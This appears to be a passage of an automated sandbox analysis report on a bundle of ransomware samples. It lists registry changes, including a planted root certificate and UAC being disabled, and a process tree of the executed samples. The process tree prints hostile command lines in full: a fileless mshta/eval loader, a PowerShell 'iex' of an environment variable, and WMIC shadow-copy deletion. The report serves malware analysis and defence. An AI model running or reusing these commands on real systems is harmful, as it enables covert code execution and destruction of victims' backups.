| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b8d48fc8adfa6b4a805f1a4a681aaa6f00000000020000000000106600000001000020000000dcb1c2df7b9ec0848d172868d47765555c8585b9b4f4e9a796ecb92d16e44306000000000e80000000020000200000000009ddf44cd3a432592f40b185e7ca755aeb619570ca3c178ac3406b4d9016092000000054c386b60a1707934e36666afac92f5a2074dc2a29540d61661d7f837f07673540000000b855f6899f3b0eb13dffa4ab690c66812e9e9423d998c020c6da09e3439427f43938599ccb2f708b215c8438c7eb7c0129b81b6940b4de4cc37e94e97a67a01a | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\MINIE | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\MINIE | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\International | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 40fc5e112a3ddb01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Windows\mbhvrmroopgk.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Windows\mbhvrmroopgk.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: MapViewOfSection
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\mbhvrmroopgk.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Shade.vr-f9cc48c63abafdadfc229a0ac94edffdf983f635dd6ce1a58121a2e881f7fe9c.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Windows\mbhvrmroopgk.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Windows\mbhvrmroopgk.exe | N/A |
Processes
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00272.7z"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.MSIL.Foreign.gen-d3585f6d8260f3af04debbcd9ef854d6763c5ec42c42610a6fb219f0c33f325d.exe
HEUR-Trojan-Ransom.MSIL.Foreign.gen-d3585f6d8260f3af04debbcd9ef854d6763c5ec42c42610a6fb219f0c33f325d.exe
C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.NSIS.Shade.gen-d1f89325958075f2c5844522563cbc91019828b9e29758de4e2b621548d4cb65.exe
HEUR-Trojan-Ransom.NSIS.Shade.gen-d1f89325958075f2c5844522563cbc91019828b9e29758de4e2b621548d4cb65.exe
C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.Win32.Agent.gen-06bcdd333935c1f1c251ee836533f2330030eaf5d37444a6dd86732cf9370b5b.exe
HEUR-Trojan-Ransom.Win32.Agent.gen-06bcdd333935c1f1c251ee836533f2330030eaf5d37444a6dd86732cf9370b5b.exe
C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.Win32.Agent.gen-fb9b7b8c11c10bbe837d5618118276d2c9a926ef85ed144a48fd1551efbfb37e.exe
HEUR-Trojan-Ransom.Win32.Agent.gen-fb9b7b8c11c10bbe837d5618118276d2c9a926ef85ed144a48fd1551efbfb37e.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.NSIS.Onion.afxv-195d8b2ecfbb6c0b6d2c3f6eff068eb99089bb75655760d8302e1517357f2400.exe
Trojan-Ransom.NSIS.Onion.afxv-195d8b2ecfbb6c0b6d2c3f6eff068eb99089bb75655760d8302e1517357f2400.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Bitman.kmx-c2cf183728169e52ff321e73ab1ace52208a03781942d3323281b89ef29e681e.exe
Trojan-Ransom.Win32.Bitman.kmx-c2cf183728169e52ff321e73ab1ace52208a03781942d3323281b89ef29e681e.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Foreign.niji-e37766201ae534aa196d0afd8e9131f7f2b029aef9cbc5110c7666894c8dd6c6.exe
Trojan-Ransom.Win32.Foreign.niji-e37766201ae534aa196d0afd8e9131f7f2b029aef9cbc5110c7666894c8dd6c6.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Gen.nw-b8949ae0d1a481af1cae9df5e01d508d1319b6d47fb329e9b42627e4e2a72a3d.exe
Trojan-Ransom.Win32.Gen.nw-b8949ae0d1a481af1cae9df5e01d508d1319b6d47fb329e9b42627e4e2a72a3d.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Locky.bil-a310a444b8be17dec94e41f1710ebebf6eb84e18fb7f47d795796b7af4f24442.exe
Trojan-Ransom.Win32.Locky.bil-a310a444b8be17dec94e41f1710ebebf6eb84e18fb7f47d795796b7af4f24442.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Locky.d-78e9558a9762cf778a3ba9ba61e0ec73e8d81c22d0945e56ea75d197c512883a.exe
Trojan-Ransom.Win32.Locky.d-78e9558a9762cf778a3ba9ba61e0ec73e8d81c22d0945e56ea75d197c512883a.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Scatter.jt-100b8bfff550fb74c98a2ef9a71d4bb53553d2d7ba509bb451fe32814ec57e48.exe
Trojan-Ransom.Win32.Scatter.jt-100b8bfff550fb74c98a2ef9a71d4bb53553d2d7ba509bb451fe32814ec57e48.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Scatter.kj-8da94dbae85508bec272d12ca4a80a3607a24bf63d3217a31b29b10adecdc592.exe
Trojan-Ransom.Win32.Scatter.kj-8da94dbae85508bec272d12ca4a80a3607a24bf63d3217a31b29b10adecdc592.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Shade.lfk-2d9f35116b5be4c23bf217eb04cf533f05caefbe4b2bf4c58638659e6a440326.exe
Trojan-Ransom.Win32.Shade.lfk-2d9f35116b5be4c23bf217eb04cf533f05caefbe4b2bf4c58638659e6a440326.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Shade.vr-f9cc48c63abafdadfc229a0ac94edffdf983f635dd6ce1a58121a2e881f7fe9c.exe
Trojan-Ransom.Win32.Shade.vr-f9cc48c63abafdadfc229a0ac94edffdf983f635dd6ce1a58121a2e881f7fe9c.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Zerber.fctg-380fd1bd4fbbacd3cd0146954622cc8380077639ed7930809fa5489763da54ed.exe
Trojan-Ransom.Win32.Zerber.fctg-380fd1bd4fbbacd3cd0146954622cc8380077639ed7930809fa5489763da54ed.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Shade.lfk-2d9f35116b5be4c23bf217eb04cf533f05caefbe4b2bf4c58638659e6a440326.exe
Trojan-Ransom.Win32.Shade.lfk-2d9f35116b5be4c23bf217eb04cf533f05caefbe4b2bf4c58638659e6a440326.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Zerber.fctg-380fd1bd4fbbacd3cd0146954622cc8380077639ed7930809fa5489763da54ed.exe
Trojan-Ransom.Win32.Zerber.fctg-380fd1bd4fbbacd3cd0146954622cc8380077639ed7930809fa5489763da54ed.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Scatter.kj-8da94dbae85508bec272d12ca4a80a3607a24bf63d3217a31b29b10adecdc592.exe
Trojan-Ransom.Win32.Scatter.kj-8da94dbae85508bec272d12ca4a80a3607a24bf63d3217a31b29b10adecdc592.exe
C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.Win32.Agent.gen-06bcdd333935c1f1c251ee836533f2330030eaf5d37444a6dd86732cf9370b5b.exe
HEUR-Trojan-Ransom.Win32.Agent.gen-06bcdd333935c1f1c251ee836533f2330030eaf5d37444a6dd86732cf9370b5b.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C del /Q /F "C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.Win32.Agent.gen-06bcdd333935c1f1c251ee836533f2330030eaf5d37444a6dd86732cf9370b5b.exe"
C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.Win32.Agent.gen-fb9b7b8c11c10bbe837d5618118276d2c9a926ef85ed144a48fd1551efbfb37e.exe
HEUR-Trojan-Ransom.Win32.Agent.gen-fb9b7b8c11c10bbe837d5618118276d2c9a926ef85ed144a48fd1551efbfb37e.exe
C:\Windows\syswow64\svchost.exe
C:\Windows\syswow64\svchost.exe
C:\Windows\SysWOW64\svchost.exe
"C:\Windows\system32\svchost.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sys82F5.tmp"
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Shade.vr-f9cc48c63abafdadfc229a0ac94edffdf983f635dd6ce1a58121a2e881f7fe9c.exe
"C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Shade.vr-f9cc48c63abafdadfc229a0ac94edffdf983f635dd6ce1a58121a2e881f7fe9c.exe"
C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" javascript:NnxrCN3="tZljD6W5";K8I=new%20ActiveXObject("WScript.Shell");tQbeT9OL9="hC";RV7Yx=K8I.RegRead("HKLM\\software\\Wow6432Node\\Vc8Othhops\\EPo8cL");c7aBwef="gFCwXQG";eval(RV7Yx);Zru3zfXLT="c1cl6oB8cJ";
C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.NSIS.Shade.gen-d1f89325958075f2c5844522563cbc91019828b9e29758de4e2b621548d4cb65.exe
HEUR-Trojan-Ransom.NSIS.Shade.gen-d1f89325958075f2c5844522563cbc91019828b9e29758de4e2b621548d4cb65.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:cjhvut
C:\Users\Admin\AppData\Local\Temp\nso601B.tmp\2266-DailyOffers-1949-1.0.0.1045.exe
"C:\Users\Admin\AppData\Local\Temp\nso601B.tmp\2266-DailyOffers-1949-1.0.0.1045.exe" /S
C:\Users\Admin\AppData\Local\Temp\nse8BBE.tmp\mf.exe
C:\Users\Admin\AppData\Local\Temp\nse8BBE.tmp\mf.exe "C:\Users\Admin\AppData\Local\Temp\nse8BBE.tmp\inetc.dll"
C:\Users\Admin\AppData\Local\Temp\nse8BBE.tmp\ef.exe
C:\Users\Admin\AppData\Local\Temp\nse8BBE.tmp\ef.exe "C:\Users\Admin\AppData\Local\Temp\nse8BBE.tmp\inetc.dll" -1949
C:\Users\Admin\AppData\Local\Temp\svchost.exe
C:\Users\Admin\AppData\Local\Temp\svchost.exe
C:\Windows\system32\cmd.exe
cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sysD8E2.tmp"
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Bitman.kmx-c2cf183728169e52ff321e73ab1ace52208a03781942d3323281b89ef29e681e.exe
Trojan-Ransom.Win32.Bitman.kmx-c2cf183728169e52ff321e73ab1ace52208a03781942d3323281b89ef29e681e.exe
C:\Windows\mbhvrmroopgk.exe
C:\Windows\mbhvrmroopgk.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00272\TROJAN~2.EXE
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x55c
C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe
"C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe"
C:\Windows\SysWOW64\regsvr32.exe
regsvr32.exe
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\SysWOW64\regsvr32.exe"
C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe
"C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe"
C:\Windows\mbhvrmroopgk.exe
C:\Windows\mbhvrmroopgk.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" -f "C:\Users\Admin\AppData\Local\Temp\EuUHY.txt"
C:\Windows\System32\wbem\WMIC.exe
"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /noin teractive
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\_README_6LU8_.hta"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im "Trojan-Ransom.Win32.Zerber.fctg-380fd1bd4fbbacd3cd0146954622cc8380077639ed7930809fa5489763da54ed.exe"
C:\Windows\system32\PING.EXE
ping -n 1 127.0.0.1
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" -f "C:\Users\Admin\AppData\Local\Temp\aTKJG.txt"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" -f "C:\Users\Admin\AppData\Local\Temp\zXyGPPyF.txt"
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Locky.bil-a310a444b8be17dec94e41f1710ebebf6eb84e18fb7f47d795796b7af4f24442.exe
"C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Locky.bil-a310a444b8be17dec94e41f1710ebebf6eb84e18fb7f47d795796b7af4f24442.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" -f "C:\Users\Admin\AppData\Local\Temp\aEBdKflgy.txt"
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Locky.bil-a310a444b8be17dec94e41f1710ebebf6eb84e18fb7f47d795796b7af4f24442.exe
"C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Locky.bil-a310a444b8be17dec94e41f1710ebebf6eb84e18fb7f47d795796b7af4f24442.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" -f "C:\Users\Admin\AppData\Local\Temp\XeveW.txt"
C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RECOVERY.TXT
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\RECOVERY.HTM
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
